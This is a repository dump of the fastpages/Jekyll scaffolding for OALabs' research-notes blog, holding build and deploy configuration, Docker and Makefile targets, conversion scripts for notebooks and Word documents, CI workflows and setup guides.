31 |
32 | {% endif %}
33 | {% endfor %}
34 | {% endfor %}
35 |
36 | {% endif %}
37 |
--------------------------------------------------------------------------------
/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: "3"
2 | services:
3 | fastpages: &fastpages
4 | working_dir: /data
5 | environment:
6 | - INPUT_BOOL_SAVE_MARKDOWN=false
7 | build:
8 | context: ./_action_files
9 | dockerfile: ./Dockerfile
10 | image: fastpages-dev
11 | logging:
12 | driver: json-file
13 | options:
14 | max-size: 50m
15 | stdin_open: true
16 | tty: true
17 | volumes:
18 | - .:/data/
19 |
20 | converter:
21 | <<: *fastpages
22 | command: /fastpages/action_entrypoint.sh
23 |
24 | notebook:
25 | <<: *fastpages
26 | command: jupyter notebook --allow-root --no-browser --ip=0.0.0.0 --port=8080 --NotebookApp.token='' --NotebookApp.password=''
27 | ports:
28 | - "8080:8080"
29 |
30 | watcher:
31 | <<: *fastpages
32 | command: watchmedo shell-command --command /fastpages/action_entrypoint.sh --pattern *.ipynb --recursive --drop
33 | network_mode: host # for GitHub Codespaces https://github.com/features/codespaces/
34 |
35 | jekyll:
36 | working_dir: /data
37 | image: fastai/fastpages-jekyll
38 | restart: unless-stopped
39 | ports:
40 | - "4000:4000"
41 | volumes:
42 | - .:/data/
43 | command: >
44 | bash -c "chmod -R u+rw . && jekyll serve --host 0.0.0.0 --trace --strict_front_matter"
45 |
--------------------------------------------------------------------------------
/_fastpages_docs/_upgrade_pr.md:
--------------------------------------------------------------------------------
1 | Hello :wave: @{_username_}!
2 |
3 | This PR pulls the most recent files from [fastpages](https://github.com/fastai/fastpages), and attempts to replace relevant files in your repository, without changing the content of your blog posts. This allows you to receive bug fixes and feature updates.
4 |
5 | ## Warning
6 |
7 | If you have applied **customizations to the HTML or styling of your site, they may be lost if you merge this PR. Please review the changes this PR makes carefully before merging!** However, for people who only write content and don't change the styling of their site, this method is recommended.
8 |
9 | If you would like more fine-grained control over what changes to accept or decline, consider [following this approach](https://stackoverflow.com/questions/56577184/github-pull-changes-from-a-template-repository/56577320) instead.
10 |
11 | ### What to Expect After Merging This PR
12 |
13 | - GitHub Actions will build your site, which will take 3-4 minutes to complete. **This will happen anytime you push changes to the master branch of your repository.** You can monitor the logs of this if you like on the [Actions tab of your repo](https://github.com/{_username_}/{_repo_name_}/actions).
14 | - You can monitor the status of your site in the GitHub Pages section of your [repository settings](https://github.com/{_username_}/{_repo_name_}/settings).
15 |
--------------------------------------------------------------------------------
/_fastpages_docs/NOTEBOOK_FOOTNOTES.md:
--------------------------------------------------------------------------------
1 | # Detailed Guide To Footnotes in Notebooks
2 |
3 | Notebook -> HTML footnotes don't work the same way as Markdown footnotes. There isn't a good built-in solution, so we made these Jekyll plugins as a workaround.
4 |
5 | ```
6 | This adds a linked superscript {% fn 15 %}
7 |
8 | {{ "This is the actual footnote" | fndetail: 15 }}
9 | ```
10 |
11 | 
12 |
13 | You can have links, but then you have to use **single quotes** to escape the link.
14 | ```
15 | This adds a linked superscript {% fn 20 %}
16 |
17 | {{ 'This is the actual footnote with a [link](www.github.com) as well!' | fndetail: 20 }}
18 | ```
19 | 
20 |
21 | However, what if you want a single quote in your footnote? There is not an easy way to escape that. Fortunately, you can use the HTML character entity `&#39;` (you must keep the semicolon!). For example, you can include a single quote like this:
22 |
23 |
24 | ```
25 | This adds a linked superscript {% fn 20 %}
26 |
27 | {{ 'This is the actual footnote; with a [link](www.github.com) as well! and a single quote &#39; too!' | fndetail: 20 }}
28 | ```
29 |
30 | 
31 |
--------------------------------------------------------------------------------
/_action_files/hide.tpl:
--------------------------------------------------------------------------------
1 | {%- extends 'basic.tpl' -%}
2 |
3 | {% block codecell %}
4 | {{ "{% raw %}" }}
5 | {{ super() }}
6 | {{ "{% endraw %}" }}
7 | {% endblock codecell %}
8 |
9 | {% block input_group -%}
10 | {%- if cell.metadata.collapse_show -%}
11 |
12 |
13 |
41 | {%- else -%}
42 | {{ super() }}
43 | {%- endif -%}
44 | {% endblock output_area_prompt %}
--------------------------------------------------------------------------------
/Gemfile:
--------------------------------------------------------------------------------
1 | source "https://rubygems.org"
2 | # Hello! This is where you manage which Jekyll version is used to run.
3 | # When you want to use a different version, change it below, save the
4 | # file and run `bundle install`. Run Jekyll with `bundle exec`, like so:
5 | #
6 | # bundle exec jekyll serve
7 | #
8 | # This will help ensure the proper Jekyll version is running.
9 | # Happy Jekylling!
10 | gem "jekyll", "~> 4.1.0"
11 | # This is the default theme for new Jekyll sites. You may change this to anything you like.
12 | gem "minima"
13 | # To upgrade, run `bundle update github-pages`.
14 | # gem "github-pages", group: :jekyll_plugins
15 | # If you have any plugins, put them here!
16 | group :jekyll_plugins do
17 | gem "jekyll-feed", "~> 0.12"
18 | gem 'jekyll-octicons'
19 | gem 'jekyll-remote-theme'
20 | gem "jekyll-twitter-plugin"
21 | gem 'jekyll-relative-links'
22 | gem 'jekyll-seo-tag'
23 | gem 'jekyll-toc'
24 | gem 'jekyll-gist'
25 | gem 'jekyll-paginate'
26 | gem 'jekyll-sitemap'
27 | end
28 |
29 | gem "kramdown-math-katex"
30 | gem "jemoji"
31 |
32 | # Windows and JRuby does not include zoneinfo files, so bundle the tzinfo-data gem
33 | # and associated library.
34 | install_if -> { RUBY_PLATFORM =~ %r!mingw|mswin|java! } do
35 | gem "tzinfo", "~> 1.2"
36 | gem "tzinfo-data"
37 | end
38 |
39 | # Performance-booster for watching directories on Windows
40 | gem "wdm", "~> 0.1.1", :install_if => Gem.win_platform?
41 |
42 | gem "faraday", "< 1.0"
43 |
44 |
--------------------------------------------------------------------------------
/_action_files/check_js.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # The purpose of this script is to check parity between official hosted third party js libraries, and alternative CDNs used on this site.
3 |
4 | function compare {
5 | printf "=================\ncomparing:\n%s vs. %s\n" "$1" "$2"
6 | wget "$1" -O f1 &> /dev/null
7 | wget "$2" -O f2 &> /dev/null
8 | if ! cmp f1 f2;
9 | then
10 | printf "Files are NOT the same!\n"
11 | exit 1;
12 | else
13 | printf "Files are the same.\n"
14 | fi
15 | }
16 |
17 | compare "https://unpkg.com/@primer/css/dist/primer.css" "https://cdnjs.cloudflare.com/ajax/libs/Primer/15.2.0/primer.css"
18 | #compare "https://hypothes.is/embed.js" "https://cdn.jsdelivr.net/npm/hypothesis/build/boot.js"
19 | compare "https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/contrib/auto-render.min.js" "https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.12.0/contrib/auto-render.min.js"
20 | compare "https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css" "https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.12.0/katex.min.css"
21 | compare "https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.js" "https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.12.0/katex.min.js"
22 | compare "https://cdn.jsdelivr.net/npm/mathjax@2.7.5/MathJax.js" "https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js"
23 |
24 | # Remove files created for comparison
25 | rm f1 f2
26 |
--------------------------------------------------------------------------------
/_action_files/fast_template.py:
--------------------------------------------------------------------------------
1 | from datetime import datetime
2 | import re, os
3 | from pathlib import Path
4 | from typing import Tuple, Set
5 |
6 | # Check for YYYY-MM-DD
7 | _re_blog_date = re.compile(r'([12]\d{3}-(0[1-9]|1[0-2])-(0[1-9]|[12]\d|3[01])-)')
9 | # Check for leading dashes or numbers
9 | _re_numdash = re.compile(r'(^[-\d]+)')
10 |
11 | def rename_for_jekyll(nb_path: Path, warnings: Set[Tuple[str, str]]=None) -> str:
12 | """
13 | Return a Path's filename string prepended with its modified time in YYYY-MM-DD format.
14 | """
15 | assert nb_path.exists(), f'{nb_path} could not be found.'
16 |
17 | # Checks if filename is compliant with Jekyll blog posts
18 | if _re_blog_date.match(nb_path.name): return nb_path.with_suffix('.md').name.replace(' ', '-')
19 |
20 | else:
21 | clean_name = _re_numdash.sub('', nb_path.with_suffix('.md').name).replace(' ', '-')
22 |
23 | # Get the file's last modified time and prepend YYYY-MM-DD- to the beginning of the filename
24 | mdate = os.path.getmtime(nb_path) - 86400 # subtract one day b/c dates in the future break Jekyll
25 | dtnm = datetime.fromtimestamp(mdate).strftime("%Y-%m-%d-") + clean_name
26 | assert _re_blog_date.match(dtnm), f'{dtnm} is not a valid name, filename must be prepended with YYYY-MM-DD-'
27 | # push this into a set b/c _nb2htmlfname gets called multiple times per conversion
28 | if warnings: warnings.add((nb_path, dtnm))
29 | return dtnm
30 |
--------------------------------------------------------------------------------
/_action_files/settings.ini:
--------------------------------------------------------------------------------
1 | [DEFAULT]
2 | lib_name = nbdev
3 | user = fastai
4 | branch = master
5 | version = 0.2.10
6 | description = Writing a library entirely in notebooks
7 | keywords = jupyter notebook
8 | author = Sylvain Gugger and Jeremy Howard
9 | author_email = info@fast.ai
10 | baseurl =
11 | title = nbdev
12 | copyright = fast.ai
13 | license = apache2
14 | status = 2
15 | min_python = 3.6
16 | audience = Developers
17 | language = English
18 | requirements = nbformat>=4.4.0 nbconvert>=5.6.1 pyyaml fastscript packaging
19 | console_scripts = nbdev_build_lib=nbdev.cli:nbdev_build_lib
20 | nbdev_update_lib=nbdev.cli:nbdev_update_lib
21 | nbdev_diff_nbs=nbdev.cli:nbdev_diff_nbs
22 | nbdev_test_nbs=nbdev.cli:nbdev_test_nbs
23 | nbdev_build_docs=nbdev.cli:nbdev_build_docs
24 | nbdev_nb2md=nbdev.cli:nbdev_nb2md
25 | nbdev_trust_nbs=nbdev.cli:nbdev_trust_nbs
26 | nbdev_clean_nbs=nbdev.clean:nbdev_clean_nbs
27 | nbdev_read_nbs=nbdev.cli:nbdev_read_nbs
28 | nbdev_fix_merge=nbdev.cli:nbdev_fix_merge
29 | nbdev_install_git_hooks=nbdev.cli:nbdev_install_git_hooks
30 | nbdev_bump_version=nbdev.cli:nbdev_bump_version
31 | nbdev_new=nbdev.cli:nbdev_new
32 | nbdev_detach=nbdev.cli:nbdev_detach
33 | nbs_path = nbs
34 | doc_path = images/copied_from_nb
35 | doc_host = https://nbdev.fast.ai
36 | doc_baseurl = %(baseurl)s/images/copied_from_nb/
37 | git_url = https://github.com/fastai/nbdev/tree/master/
38 | lib_path = nbdev
39 | tst_flags = fastai2
40 | custom_sidebar = False
41 | cell_spacing = 1
42 | monospace_docstrings = False
43 | jekyll_styles = note,warning,tip,important,youtube,twitter
44 |
45 |
--------------------------------------------------------------------------------
/_word/README.md:
--------------------------------------------------------------------------------
1 | # Automatically Convert MS Word (*.docx) Documents To Blog Posts
2 |
3 | _Note: You can convert Google Docs to Word Docs by navigating to the File menu, and selecting Download > Microsoft Word (.docx)_
4 |
5 | [`fastpages`](https://github.com/fastai/fastpages) will automatically convert Word documents (.docx) saved into this directory into blog posts! Furthermore, images in your document are saved and displayed in your blog post automatically, as you would expect.
6 |
7 | ## Usage
8 |
9 | 1. Create a Word Document (must be .docx) with the contents of your blog post.
10 |
11 | 2. Save your file with the naming convention `YYYY-MM-DD-*.docx` into the `/_word` folder of this repo. For example `2020-01-28-My-First-Post.docx`. This [naming convention is required by Jekyll](https://jekyllrb.com/docs/posts/) to render your blog post.
12 | - Be careful to name your file correctly! It is easy to forget the last dash in `YYYY-MM-DD-`. Furthermore, the character immediately following the dash should only be an alphabetical letter. Examples of valid filenames are:
13 |
14 | ```shell
15 | 2020-01-28-My-First-Post.docx
16 | 2012-09-12-how-to-write-a-blog.docx
17 | ```
18 |
19 | - If you fail to name your file correctly, `fastpages` will automatically attempt to fix the problem by prepending the last modified date of your document to your generated blog post. However, it is recommended that you name your files properly yourself for more transparency.
20 |
21 | 3. Synchronize your files with GitHub by [following the instructions in this blog post](https://www.fast.ai/2020/01/18/gitblog/).
22 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | help:
2 | cat Makefile
3 |
4 | # start (or restart) the services
5 | server: .FORCE
6 | docker-compose down --remove-orphans || true;
7 | docker-compose up
8 |
9 | # start (or restart) the services in detached mode
10 | server-detached: .FORCE
11 | docker-compose down || true;
12 | docker-compose up -d
13 |
14 | # build or rebuild the services WITHOUT cache
15 | build: .FORCE
16 | chmod 777 Gemfile.lock
17 | docker-compose stop || true; docker-compose rm || true;
18 | docker build --no-cache -t fastai/fastpages-jekyll -f _action_files/fastpages-jekyll.Dockerfile .
19 | docker-compose build --force-rm --no-cache
20 |
21 | # rebuild the services WITH cache
22 | quick-build: .FORCE
23 | docker-compose stop || true;
24 | docker build -t fastai/fastpages-jekyll -f _action_files/fastpages-jekyll.Dockerfile .
25 | docker-compose build
26 |
27 | # convert word & nb without Jekyll services
28 | convert: .FORCE
29 | docker-compose up converter
30 |
31 | # stop all containers
32 | stop: .FORCE
33 | docker-compose stop
34 | docker ps | grep fastpages | awk '{print $$1}' | xargs docker stop
35 |
36 | # remove all containers
37 | remove: .FORCE
38 | docker-compose stop || true; docker-compose rm || true;
39 |
40 | # get shell inside the notebook converter service (Must already be running)
41 | bash-nb: .FORCE
42 | docker-compose exec watcher /bin/bash
43 |
44 | # get shell inside jekyll service (Must already be running)
45 | bash-jekyll: .FORCE
46 | docker-compose exec jekyll /bin/bash
47 |
48 | # restart just the Jekyll server
49 | restart-jekyll: .FORCE
50 | docker-compose restart jekyll
51 |
52 | .FORCE:
53 | chmod -R u+rw .
54 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | [](https://discord.gg/UWdMC3W2qn)
4 | [](https://www.patreon.com/oalabs)
5 |
6 |
7 | [**research.openanalysis.net**](https://research.openanalysis.net)
8 |
9 | # Research Notes
10 |
11 | This is our research notes repository, formerly known as "Lab-Notes". We use [Jupyter Notebooks](https://jupyter.org/) for all of our notes so we can directly include code. The raw notes can be found in this repository in the [_notebooks](https://github.com/OALabs/research/tree/master/_notebooks) directory and our full blog is available online at [research.openanalysis.net](https://research.openanalysis.net).
12 |
13 |
14 | ## How To Add Notes
15 |
16 | Adding a new note is as simple as cloning our repository and launching `jupyter-lab` from the [_notebooks](https://github.com/OALabs/research/tree/master/_notebooks) directory. You can then edit notes, or add new ones.
17 |
18 | The note filename must start with the date in the format `yyyy-mm-dd-` for example `2022-02-22-my_note.ipynb`.
19 |
20 | Each note must include a special markdown cell as the first cell in the notebook. The cell contains the markdown used to generate our blog posts.
21 | ```
22 | # Blog Title
23 | > Blog Subtitle
24 |
25 | - toc: true
26 | - badges: true
27 | - categories: [tagone,tag two]
28 | ```
29 | The blog is generated using fastpages. Full documentation can be found on the [fastpages](https://github.com/fastai/fastpages) GitHub.
30 |
31 |
32 |
--------------------------------------------------------------------------------
/_action_files/word2post.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | # This sets the environment variable when testing locally and not in a GitHub Action
4 | if [ -z "$GITHUB_ACTIONS" ]; then
5 | GITHUB_WORKSPACE='/data'
6 | echo "=== Running Locally: All assets expected to be in the directory /data ==="
7 | fi
8 |
9 | # Loops through directory of *.docx files and converts to markdown
10 | # markdown files are saved in _posts, media assets are saved in assets/img//media
11 | for FILENAME in "${GITHUB_WORKSPACE}"/_word/*.docx; do
12 | [ -e "$FILENAME" ] || continue # skip when glob doesn't match
13 | NAME=${FILENAME##*/} # Get filename without the directory
14 | NEW_NAME=$(python3 "/fastpages/word2post.py" "${FILENAME}") # clean filename to be Jekyll compliant for posts
15 | BASE_NEW_NAME=${NEW_NAME%.md} # Strip the file extension
16 |
17 | if [ -z "$NEW_NAME" ]; then
18 | echo "Unable To Rename: ${FILENAME} to a Jekyll compliant filename for blog posts"
19 | exit 1
20 | fi
21 |
22 | echo "Converting: ${NAME} ---to--- ${NEW_NAME}"
23 | cd ${GITHUB_WORKSPACE} || { echo "Failed to change to Github workspace directory"; exit 1; }
24 | pandoc --from docx --to gfm --output "${GITHUB_WORKSPACE}/_posts/${NEW_NAME}" --columns 9999 \
25 | --extract-media="assets/img/${BASE_NEW_NAME}" --standalone "${FILENAME}"
26 |
27 | # Inject correction to image links in markdown
28 | sed -i.bak 's/!\[\](assets/!\[\]({{ site.url }}{{ site.baseurl }}\/assets/g' "_posts/${NEW_NAME}"
29 | # Remove intermediate files
30 | rm _posts/*.bak 2> /dev/null || true
31 |
32 | cat "${GITHUB_WORKSPACE}/_action_files/word_front_matter.txt" "_posts/${NEW_NAME}" > temp && mv temp "_posts/${NEW_NAME}"
33 | done
34 |
--------------------------------------------------------------------------------
/_action_files/action_entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | set -e
3 |
4 | # setup ssh: allow key to be used without a prompt and start ssh agent
5 | export GIT_SSH_COMMAND="ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"
6 | eval "$(ssh-agent -s)"
7 |
8 | ######## Run notebook/word converter ########
9 | # word converter using pandoc
10 | /fastpages/word2post.sh
11 | # notebook converter using nbdev
12 | cp /fastpages/settings.ini .
13 | python /fastpages/nb2post.py
14 |
15 |
16 | ######## Optionally save files and build GitHub Pages ########
17 | if [[ "$INPUT_BOOL_SAVE_MARKDOWN" == "true" ]];then
18 |
19 | if [ -z "$INPUT_SSH_DEPLOY_KEY" ];then
20 | echo "You must set the SSH_DEPLOY_KEY input if BOOL_SAVE_MARKDOWN is set to true.";
21 | exit 1;
22 | fi
23 |
24 | # Get user's email from commit history
25 | if [[ "$GITHUB_EVENT_NAME" == "push" ]];then
26 | USER_EMAIL=$(jq '.commits | .[0] | .author.email' < "$GITHUB_EVENT_PATH")
27 | else
28 | USER_EMAIL="actions@github.com"
29 | fi
30 |
31 | # Setup Git credentials if we are planning to change the data in the repo
32 | git config --global user.name "$GITHUB_ACTOR"
33 | git config --global user.email "$USER_EMAIL"
34 | git remote add fastpages-origin "git@github.com:$GITHUB_REPOSITORY.git"
35 | echo "${INPUT_SSH_DEPLOY_KEY}" > _mykey
36 | chmod 400 _mykey
37 | ssh-add _mykey
38 |
39 | # Optionally save intermediate markdown
40 | if [[ "$INPUT_BOOL_SAVE_MARKDOWN" == "true" ]]; then
41 | git pull fastpages-origin "${GITHUB_REF}" --ff-only
42 | git add _posts
43 | git commit -m "[Bot] Update $INPUT_FORMAT blog posts" --allow-empty
44 | git push fastpages-origin HEAD:"$GITHUB_REF"
45 | fi
46 | fi
47 |
48 |
49 |
--------------------------------------------------------------------------------
/.github/workflows/ci.yaml:
--------------------------------------------------------------------------------
1 | name: CI
2 | on:
3 | push:
4 | branches:
5 | - master # need to filter here so we only deploy when there is a push to master
6 | # no filters on pull requests, so intentionally left blank
7 | pull_request:
8 | workflow_dispatch:
9 |
10 | jobs:
11 | build-site:
12 | if: ( github.event.commits[0].message != 'Initial commit' ) || github.run_number > 1
13 | runs-on: ubuntu-latest
14 | steps:
15 |
16 | - name: Check if secret exists
17 | if: github.event_name == 'push'
18 | run: |
19 | if [ -z "$deploy_key" ]
20 | then
21 | echo "You do not have a secret named SSH_DEPLOY_KEY. This means you did not follow the setup instructions carefully. Please try setting up your repo again with the right secrets."
22 | exit 1;
23 | fi
24 | env:
25 | deploy_key: ${{ secrets.SSH_DEPLOY_KEY }}
26 |
27 |
28 | - name: Copy Repository Contents
29 | uses: actions/checkout@main
30 | with:
31 | persist-credentials: false
32 |
33 | - name: convert notebooks and word docs to posts
34 | uses: ./_action_files
35 |
36 | - name: setup directories for Jekyll build
37 | run: |
38 | rm -rf _site
39 | sudo chmod -R 777 .
40 |
41 | - name: Jekyll build
42 | uses: docker://herrcore/fastpages-jekyll-image
43 | with:
44 | args: bash -c "jekyll build -V --strict_front_matter --trace"
45 | env:
46 | JEKYLL_ENV: 'production'
47 |
48 | - name: copy CNAME file into _site if CNAME exists
49 | run: |
50 | sudo chmod -R 777 _site/
51 | cp CNAME _site/ 2>/dev/null || :
52 |
53 | - name: Deploy
54 | if: github.event_name == 'push'
55 | uses: peaceiris/actions-gh-pages@v3
56 | with:
57 | deploy_key: ${{ secrets.SSH_DEPLOY_KEY }}
58 | publish_dir: ./_site
59 |
--------------------------------------------------------------------------------
/assets/badges/github.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/assets/js/search-data.json:
--------------------------------------------------------------------------------
1 | ---
2 | ---
3 | {
4 | {% assign comma = false %}
5 | {%- assign date_format = site.minima.date_format | default: "%b %-d, %Y" -%}
6 | {% for post in site.posts %}
7 | {% if post.search_exclude != true %}
8 | {% if comma == true%},{% endif %}"post{{ forloop.index0 }}": {
9 | "title": "{{ post.title | replace: '&', '&' }}",
10 | "content": "{{ post.content | markdownify | replace: ' li > div {
87 | box-shadow: none !important;
88 | background-color: $overlay;
89 | border: none !important;
90 | }
91 |
92 | li .post-meta-description {
93 | color: $med-emph !important;
94 | }
95 |
--------------------------------------------------------------------------------
/assets/badges/colab.svg:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/_fastpages_docs/_manual_setup.md:
--------------------------------------------------------------------------------
1 | # Manual Setup Instructions
2 |
3 | These are the setup steps that are automated by [setup.yaml](.github/workflows/setup.yaml)
4 |
5 | 1. Click the [](https://github.com/fastai/fastpages/generate) button to create a copy of this repo in your account.
6 |
7 | 2. [Follow these instructions to create an ssh-deploy key](https://developer.github.com/v3/guides/managing-deploy-keys/#deploy-keys). Make sure you **select Allow write access** when adding this key to your GitHub account.
8 |
9 | 3. [Follow these instructions to upload your deploy key](https://help.github.com/en/actions/configuring-and-managing-workflows/creating-and-storing-encrypted-secrets#creating-encrypted-secrets) as an encrypted secret on GitHub. Make sure you name your key `SSH_DEPLOY_KEY`. Note: The deploy key secret is your **private key** (NOT the public key).
10 |
11 | 4. [Create a branch](https://help.github.com/en/github/collaborating-with-issues-and-pull-requests/creating-and-deleting-branches-within-your-repository#creating-a-branch) named `gh-pages`.
12 |
13 | 5. Change the badges on this README to point to **your** repository instead of `fastai/fastpages`. Badges are organized in a section at the beginning of this README. For example, you should replace `fastai` and `fastpages` in the below url:
14 |
15 | ``
16 |
17 | to
18 |
19 | ``
20 |
21 | 6. Change `baseurl:` in `_config.yml` to the name of your repository. For example, instead of
22 |
23 | `baseurl: "/fastpages"`
24 |
25 | this should be
26 |
27 | `baseurl: "/your-repo-name"`
28 |
29 | 7. Similarly, change the `url:` parameter in `_config.yml` to the URL your blog will be served on. For example, instead of
30 |
31 | `url: "https://fastpages.fast.ai/"`
32 |
33 | this should be
34 |
35 | `url: "https://.github.io"`
36 |
37 | 8. Read through `_config.yaml` carefully as there may be other options that must be set. The comments in this file will provide instructions.
38 |
39 | 9. Delete the `CNAME` file from the root of your `master` branch (or change it if you are using a custom domain)
40 |
41 | 10. Go to your [repository settings and enable GitHub Pages](https://help.github.com/en/enterprise/2.13/user/articles/configuring-a-publishing-source-for-github-pages) with the `gh-pages` branch you created earlier.
--------------------------------------------------------------------------------
/_layouts/home.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: default
3 | ---
4 |
5 |
--------------------------------------------------------------------------------
/_fastpages_docs/_setup_pr_template.md:
--------------------------------------------------------------------------------
1 | Hello :wave: @OALabs! Thank you for using fastpages!
2 |
3 | ## Before you merge this PR
4 |
5 | 1. Create an ssh key-pair. Open this utility. Select: `RSA` and `4096` and leave `Passphrase` blank. Click the blue button `Generate-SSH-Keys`.
6 |
7 | 2. Navigate to this link and click `New repository secret`. Copy and paste the **Private Key** into the `Value` field. This includes the "-----BEGIN RSA PRIVATE KEY-----" and "-----END RSA PRIVATE KEY-----" portions. **In the `Name` field, name the secret `SSH_DEPLOY_KEY`.**
8 |
9 | 3. Navigate to this link and click the `Add deploy key` button. Paste your **Public Key** from step 1 into the `Key` box. In the `Title`, name the key anything you want, for example `fastpages-key`. Finally, **make sure you click the checkbox next to `Allow write access`** (pictured below), and click `Add key` to save the key.
10 |
11 | 
12 |
13 |
14 | ### What to Expect After Merging This PR
15 |
16 | - GitHub Actions will build your site, which will take 2-3 minutes to complete. **This will happen anytime you push changes to the master branch of your repository.** You can monitor the logs of this if you like on the [Actions tab of your repo](https://github.com/OALabs/research/actions).
17 | - Your GH-Pages Status badge on your README will eventually appear and be green, indicating your first successful build.
18 | - You can monitor the status of your site in the GitHub Pages section of your [repository settings](https://github.com/OALabs/research/settings).
19 |
20 | If you are not using a custom domain, your website will appear at:
21 |
22 | #### https://OALabs.github.io/research
23 |
24 |
25 | ## Optional: Using a Custom Domain
26 |
27 | 1. After merging this PR, add a file named `CNAME` at the root of your repo. For example, the `fastpages` blog is hosted at `https://fastpages.fast.ai`, which means [our CNAME](https://github.com/fastai/fastpages/blob/master/CNAME) contains the following contents:
28 |
29 |
30 | >`fastpages.fast.ai`
31 |
32 |
33 | 2. Change the `url` and `baseurl` parameters in your `/_config.yml` file to reflect your custom domain.
34 |
35 |
36 | Wondering how to set up a custom domain? See [this article](https://dev.to/trentyang/how-to-setup-google-domain-for-github-pages-1p58). You must add a CNAME file to the root of your master branch for the instructions in the article to work correctly.
37 |
38 |
39 | ## Questions
40 |
41 | Please use the [nbdev & blogging channel](https://forums.fast.ai/c/fastai-users/nbdev/48) in the fastai forums for any questions or feature requests.
42 |
--------------------------------------------------------------------------------
/assets/badges/binder.svg:
--------------------------------------------------------------------------------
1 | launchlaunchbinderbinder
--------------------------------------------------------------------------------
/.github/workflows/check_config.yaml:
--------------------------------------------------------------------------------
1 | name: Check Configurations
2 | on: push
3 |
4 | jobs:
5 | check-config:
6 | runs-on: ubuntu-latest
7 | steps:
8 | - uses: actions/checkout@main
9 |
10 | - name: Set up Python
11 | uses: actions/setup-python@v1
12 | with:
13 | python-version: 3.7
14 |
15 | - name: install dependencies
16 | run: pip3 install pyyaml
17 |
18 | - name: check baseurl
19 | id: baseurl
20 | run: |
21 | import yaml
22 | from pathlib import Path
23 | from configparser import ConfigParser
24 | settings = ConfigParser()
25 |
26 | config_path = Path('_config.yml')
27 | settings_path = Path('_action_files/settings.ini')
28 |
29 | assert config_path.exists(), 'Did not find _config.yml in the current directory!'
30 | assert settings_path.exists(), 'Did not find _action_files/settings.ini in the current directory!'
31 |
32 | settings.read(settings_path)
33 | with open('_config.yml') as f:
34 | config = yaml.safe_load(f)
35 |
36 | errmsg = f"The value set for baseurl in _action_files/settings.ini and _config.yml are not identical. Please fix and try again."
37 | assert config['baseurl'] == settings['DEFAULT']['baseurl'], errmsg
38 | shell: python
39 |
40 | - name: Create issue if baseurl rule is violated
41 | if: steps.baseurl.outcome == 'failure'
42 | uses: actions/github-script@0.6.0
43 | with:
44 | github-token: ${{secrets.GITHUB_TOKEN}}
45 | script: |
46 | var err = process.env.ERROR_STRING;
47 | var run_id = process.env.RUN_ID;
48 | github.issues.create({
49 | owner: context.repo.owner,
50 | repo: context.repo.repo,
51 | title: "Error with repository configuration: baseurl",
52 | body: `${err}\n See run [${run_id}](https://github.com/${context.repo.owner}/${context.repo.repo}/actions/runs/${run_id}) for more details.`
53 | })
54 | env:
55 | ERROR_STRING: "You have not configured your baseurl correctly, please read the instructions in _config.yml carefully."
56 | RUN_ID: ${{ github.run_id }}
57 |
58 | - name: check for User Pages
59 | id: userpage
60 | run: |
61 | import os
62 | nwo = os.getenv('GITHUB_REPOSITORY')
63 | errmsg = "fastpages does not support User Pages or repo names that end with github.io, please see https://forums.fast.ai/t/fastpages-replacing-main-username-github-io-page-w-fastpages/64316/3 for more details."
64 | assert ".github.io" not in nwo, errmsg
65 | shell: python
66 |
67 | - name: Create Issue if User Pages rule is violated
68 | if: steps.userpage.outcome == 'failure'
69 | uses: actions/github-script@0.6.0
70 | with:
71 | github-token: ${{secrets.GITHUB_TOKEN}}
72 | script: |
73 | github.issues.create({
74 | owner: context.repo.owner,
75 | repo: context.repo.repo,
76 | title: "Error with repository configuration: repo name",
77 | body: 'fastpages does not support User Pages or repo names that end with github.io, please see https://forums.fast.ai/t/fastpages-replacing-main-username-github-io-page-w-fastpages/64316/3 for more details.'
78 | })
79 |
--------------------------------------------------------------------------------
/_includes/custom-head.html:
--------------------------------------------------------------------------------
1 | {% comment %}
2 | Placeholder to allow defining custom head, in principle, you can add anything here, e.g. favicons:
3 |
4 | 1. Head over to https://realfavicongenerator.net/ to add your own favicons.
5 | 2. Customize default _includes/custom-head.html in your source directory and insert the given code snippet.
6 | {% endcomment %}
7 |
8 |
9 | {%- include favicons.html -%}
10 |
11 |
12 |
13 | {%- if site.annotations -%}
14 |
15 | {%- endif -%}
16 |
17 | {% if site.use_math %}
18 |
19 |
20 |
21 |
22 |
33 | {% endif %}
34 |
35 |
56 |
57 |
64 |
--------------------------------------------------------------------------------
/_fastpages_docs/README_TEMPLATE.md:
--------------------------------------------------------------------------------
1 | [//]: # (This template replaces README.md when someone creates a new repo with the fastpages template.)
2 |
3 | 
4 | 
5 | [](https://github.com/fastai/fastpages)
6 |
7 | https://{_username_}.github.io/{_repo_name_}/
8 |
9 | # My Blog
10 |
11 |
12 | _powered by [fastpages](https://github.com/fastai/fastpages)_
13 |
14 |
15 | ## What To Do Next?
16 |
17 | Great! You have set up your repo. Now it's time to start writing content. Some helpful links:
18 |
19 | - [Writing Blogs With Jupyter](https://github.com/fastai/fastpages#writing-blog-posts-with-jupyter)
20 |
21 | - [Writing Blogs With Markdown](https://github.com/fastai/fastpages#writing-blog-posts-with-markdown)
22 |
23 | - [Writing Blog Posts With Word](https://github.com/fastai/fastpages#writing-blog-posts-with-microsoft-word)
24 |
25 | - [(Optional) Preview Your Blog Locally](_fastpages_docs/DEVELOPMENT.md)
26 |
27 | Note: you may want to remove the example blog posts from the `_posts`, `_notebooks` or `_word` folders if you don't want them to appear on your site (leave the folders in place even if empty, don't delete them).
28 |
